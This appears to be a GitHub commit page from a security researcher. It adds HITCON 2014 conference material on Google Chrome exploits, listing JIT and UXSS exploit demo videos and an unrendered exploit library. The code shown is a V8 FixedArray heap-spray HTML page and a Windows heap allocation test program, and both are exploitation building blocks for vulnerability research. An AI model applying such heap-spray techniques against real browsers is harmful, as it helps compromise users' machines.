Skip to content

Commit

Permalink
Slides, white paper, Chrome exploit, PoC simplify
Browse files Browse the repository at this point in the history 
Add HITCON X 2014 slides, white paper, Chrome exploit and PoC simplify
(test case minimize)
  • Loading branch information
@demi6od
demi6od committed Aug 28, 2014
1 parent dcb73d5 commit 873dc40
Show file tree
Hide file tree
Showing 14 changed files with 1,701 additions and 0 deletions.
658 changes: 658 additions & 0 deletions Google Chrome/ChromeExpLib.js
View file

Large diffs are not rendered by default.

124 changes: 124 additions & 0 deletions Google Chrome/FixedArray Spray.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
<!--
Author: Chen Zhang (@demi6od) <[email protected]>
Date: 2014 May 23rd
-->

<html>
<script>
function dword2Int(data) {
return data >> 1;
}

/* Spray memory layout
------------------------
|map|length|number << 1|
------------------------
| number << 1 |
| number << 1 |
| number << 1 |
| ... |
| object pointer | 1 |
| object pointer | 1 |
| object pointer | 1 |
| ... |
------------------------
*/
function fixedArrSpray() {
fixedArrs = [];

var map = 0x4;
var length = 0x4;
var fixedArrSize = 0x10000;
var fixedArrLen = (fixedArrSize - map - length) / 4;

var fixedArrNum = 0x1000;

for (var i = 0; i < fixedArrNum; i++) {
fixedArrs[i] = new Array(fixedArrLen);

for (var j = 0; j < fixedArrLen ; j += 0x40) {
fixedArrs[i][j + 0x0] = dword2Int(0x41410001);
fixedArrs[i][j + 0x1] = dword2Int(0x41410011);
fixedArrs[i][j + 0x2] = dword2Int(0x41410021);
fixedArrs[i][j + 0x3] = dword2Int(0x41410031);
fixedArrs[i][j + 0x4] = dword2Int(0x41410041);
fixedArrs[i][j + 0x5] = dword2Int(0x41410051);
fixedArrs[i][j + 0x6] = dword2Int(0x41410061);
fixedArrs[i][j + 0x7] = dword2Int(0x41410071);
fixedArrs[i][j + 0x8] = dword2Int(0x41410081);
fixedArrs[i][j + 0x9] = dword2Int(0x41410091);
fixedArrs[i][j + 0xa] = dword2Int(0x414100a1);
fixedArrs[i][j + 0xb] = dword2Int(0x414100b1);
fixedArrs[i][j + 0xc] = dword2Int(0x414100c1);
fixedArrs[i][j + 0xd] = dword2Int(0x414100d1);
fixedArrs[i][j + 0xe] = dword2Int(0x414100e1);
fixedArrs[i][j + 0xf] = dword2Int(0x414100f1);

fixedArrs[i][j + 0x10] = dword2Int(0x41410101);
fixedArrs[i][j + 0x11] = dword2Int(0x41410111);
fixedArrs[i][j + 0x12] = dword2Int(0x41410121);
fixedArrs[i][j + 0x13] = dword2Int(0x41410131);
fixedArrs[i][j + 0x14] = dword2Int(0x41410141);
fixedArrs[i][j + 0x15] = dword2Int(0x41410151);
fixedArrs[i][j + 0x16] = dword2Int(0x41410161);
fixedArrs[i][j + 0x17] = dword2Int(0x41410171);
fixedArrs[i][j + 0x18] = dword2Int(0x41410181);
fixedArrs[i][j + 0x19] = dword2Int(0x41410191);
fixedArrs[i][j + 0x1a] = dword2Int(0x414101a1);
fixedArrs[i][j + 0x1b] = dword2Int(0x414101b1);
fixedArrs[i][j + 0x1c] = dword2Int(0x414101c1);
fixedArrs[i][j + 0x1d] = dword2Int(0x414101d1);
fixedArrs[i][j + 0x1e] = dword2Int(0x414101e1);
fixedArrs[i][j + 0x1f] = dword2Int(0x414101f1);

fixedArrs[i][j + 0x20] = dword2Int(0x41410201);
fixedArrs[i][j + 0x21] = dword2Int(0x41410211);
fixedArrs[i][j + 0x22] = dword2Int(0x41410221);
fixedArrs[i][j + 0x23] = dword2Int(0x41410231);
fixedArrs[i][j + 0x24] = dword2Int(0x41410241);
fixedArrs[i][j + 0x25] = dword2Int(0x41410251);
fixedArrs[i][j + 0x26] = dword2Int(0x41410261);
fixedArrs[i][j + 0x27] = dword2Int(0x41410271);
fixedArrs[i][j + 0x28] = dword2Int(0x41410281);
fixedArrs[i][j + 0x29] = dword2Int(0x41410291);
fixedArrs[i][j + 0x2a] = dword2Int(0x414102a1);
fixedArrs[i][j + 0x2b] = dword2Int(0x414102b1);
fixedArrs[i][j + 0x2c] = dword2Int(0x414102c1);
fixedArrs[i][j + 0x2d] = dword2Int(0x414102d1);
fixedArrs[i][j + 0x2e] = dword2Int(0x414102e1);
fixedArrs[i][j + 0x2f] = dword2Int(0x414102f1);

fixedArrs[i][j + 0x30] = dword2Int(0x41410301);
fixedArrs[i][j + 0x31] = dword2Int(0x41410311);
fixedArrs[i][j + 0x32] = dword2Int(0x41410321);
fixedArrs[i][j + 0x33] = dword2Int(0x41410331);
fixedArrs[i][j + 0x34] = dword2Int(0x41410341);
fixedArrs[i][j + 0x35] = dword2Int(0x41410351);
fixedArrs[i][j + 0x36] = dword2Int(0x41410361);
fixedArrs[i][j + 0x37] = dword2Int(0x41410371);

fixedArrs[i][j + 0x38] = dword2Int(0x41410381);
fixedArrs[i][j + 0x39] = dword2Int(0x41410391);
fixedArrs[i][j + 0x3a] = dword2Int(0x414103a1);
fixedArrs[i][j + 0x3b] = dword2Int(0x414103b1);
fixedArrs[i][j + 0x3c] = dword2Int(0x414103c1);
fixedArrs[i][j + 0x3d] = dword2Int(0x414103d1);

if ((j + 0x3e) != fixedArrLen) {
fixedArrs[i][j + 0x3e] = dword2Int(0x414103e1);
fixedArrs[i][j + 0x3f] = dword2Int(0x414103f1);
}
}

// Set fixed array start and end tag
fixedArrs[i][0] = dword2Int(0x0eadc0de);
fixedArrs[i][fixedArrLen - 1] = dword2Int(0x0eadc0de);
}
}

fixedArrSpray();

// For debug break point
parseFloat('1.1');
</script>
</html>
Binary file added Google Chrome/Google Chrome JIT Exploit Windows 7 Demo.wmv
View file
Binary file not shown.
Binary file added Google Chrome/Google Chrome JIT Exploit Windows 8.1 Demo.wmv
View file
Binary file not shown.
Binary file added Google Chrome/Google Chrome UXSS Gmail Phishing Exploit.wmv
View file
Binary file not shown.
Binary file added Google Chrome/Google Chrome UXSS Ifr Exploit Demo.wmv
View file
Binary file not shown.
Binary file added Google Chrome/Google Chrome UXSS Ifr XFO Exploit Demo.wmv
View file
Binary file not shown.
Binary file added Google Chrome/Google Chrome UXSS Win Exploit Demo.wmv
View file
Binary file not shown.
Empty file removed Google Chrome/Plan to publish after the conference
View file
Empty file.
72 changes: 72 additions & 0 deletions Google Chrome/Windows Heap Test.cpp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,72 @@
// Windows Heap Test.cpp : Defines the entry point for the console application.

#include "stdafx.h"
#include <windows.h>
#include <iostream>

using namespace std;

int _tmain(int argc, _TCHAR* argv[]) {
cout << "[+] Start" << endl;

int debug = 0;
cout << "[+] Wait for debug" << endl;
cin >> debug;

// Copy the hardware information to the SYSTEM_INFO structure.
SYSTEM_INFO siSysInfo;
GetSystemInfo(&siSysInfo);

// Display the contents of the SYSTEM_INFO structure.
cout << "[+] Hardware information:" << endl;
cout << "Page size: 0x" << hex << siSysInfo.dwPageSize << endl;
cout << "VirtualAlloc Allocation granularity : 0x" << hex << siSysInfo.dwAllocationGranularity << endl;

LPVOID lpvResult[10];
HANDLE hHeap[10];
HANDLE hHeapBlock[10];
HANDLE hDefaultHeapBlock[10];
HANDLE hLargeHeapBlock[10];

unsigned int virtualSize = 0x100000;
unsigned int heapSize = 0x10000;
unsigned int heapBlockSize = 0x1000;
unsigned int largeHeapBlockSize = 0x100000;
unsigned int heapBlockHeadLen = 0x8;
unsigned int largeHeapBlockHeadLen = 0x20;
unsigned int base = 0;

cout << "\n[+] VirtualAlloc" << endl;
for (int i = 0; i < 10; i++) {
lpvResult[i] = VirtualAlloc((LPVOID)base, virtualSize, MEM_COMMIT, PAGE_READWRITE);
cout << i << ": " << lpvResult[i] << endl;
}

cout << "\n[+] HeapCreate" << endl;
for (int i = 0; i < 10; i++) {
hHeap[i] = HeapCreate(base, heapSize, 0);
cout << i << ": " << hHeap[i] << endl;
}

cout << "\n[+] HeapAlloc" << endl;
for (int i = 0; i < 10; i++) {
hHeapBlock[i] = HeapAlloc(hHeap[0], 0, heapBlockSize - heapBlockHeadLen);
cout << i << ": " << hHeapBlock[i] << endl;
}

cout << "\n[+] Default HeapAlloc" << endl;
for (int i = 0; i < 10; i++) {
hDefaultHeapBlock[i] = HeapAlloc(GetProcessHeap(), 0, heapBlockSize - heapBlockHeadLen);
cout << i << ": " << hDefaultHeapBlock[i] << endl;
}

cout << "\n[+] Large HeapAlloc" << endl;
for (int i = 0; i < 10; i++) {
hLargeHeapBlock[i] = HeapAlloc(GetProcessHeap(), 0, largeHeapBlockSize - largeHeapBlockHeadLen);
cout << i << ": " << hLargeHeapBlock[i] << endl;
}

cout << "\n[+] End" << endl;
return 0;
}

Loading

0 comments on commit 873dc40

Please sign in to comment.